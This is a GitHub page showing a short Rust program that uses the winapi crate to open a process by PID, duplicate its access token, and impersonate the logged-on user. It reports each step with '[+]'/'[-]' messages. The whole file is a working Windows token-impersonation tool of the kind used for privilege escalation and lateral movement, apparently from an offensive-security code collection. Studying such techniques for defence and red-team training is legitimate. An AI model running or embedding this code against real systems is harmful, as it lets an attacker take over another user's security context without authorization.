-
Notifications
You must be signed in to change notification settings - Fork 307
/
main.rs
86 lines (78 loc) · 2.54 KB
/
main.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
use std::{
env,
ptr::null_mut
};
use winapi::{
um::{
processthreadsapi::{
OpenProcess,
OpenProcessToken
},
winnt::{
MAXIMUM_ALLOWED,
TOKEN_QUERY,
TOKEN_DUPLICATE,
TOKEN_IMPERSONATE,
SecurityImpersonation,
TokenPrimary,
PROCESS_QUERY_LIMITED_INFORMATION
},
handleapi::{INVALID_HANDLE_VALUE, CloseHandle},
securitybaseapi::{
DuplicateTokenEx,
ImpersonateLoggedOnUser
},
errhandlingapi::GetLastError
},
shared::{
minwindef::{
FALSE,
DWORD
},
},
ctypes::c_void
};
fn main() {
let mut token: *mut c_void = null_mut();
let mut duplicated_token: *mut c_void = null_mut();
let args: Vec<String> = env::args().collect();
if args.len() != 2 {
println!("Usage: {} <pid>", args[0]);
return;
}
unsafe {
let proc_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, args[1].parse::<DWORD>().unwrap());
if proc_handle == INVALID_HANDLE_VALUE || proc_handle == 0 as *mut c_void{
let last_error = GetLastError();
println!("[-] Failed to open process: {}", last_error);
return;
}
println!("[+] Opened process");
if OpenProcessToken(proc_handle, TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE, &mut token) == 0 {
let last_error = GetLastError();
println!("[-] Failed to open process token: {}", last_error);
CloseHandle(proc_handle);
return;
}
if DuplicateTokenEx(token, MAXIMUM_ALLOWED, null_mut(), SecurityImpersonation, TokenPrimary, &mut duplicated_token) == FALSE {
let last_error = GetLastError();
println!("[-] Failed to duplicate token: {}", last_error);
CloseHandle(token);
CloseHandle(proc_handle);
return;
}
println!("[+] Duplicated token");
if ImpersonateLoggedOnUser(duplicated_token) == FALSE {
let last_error = GetLastError();
println!("[-] Failed to impersonate user: {}", last_error);
CloseHandle(duplicated_token);
CloseHandle(token);
CloseHandle(proc_handle);
return;
}
println!("[+] This thread running as the impersonated user!");
CloseHandle(duplicated_token);
CloseHandle(token);
CloseHandle(proc_handle);
};
}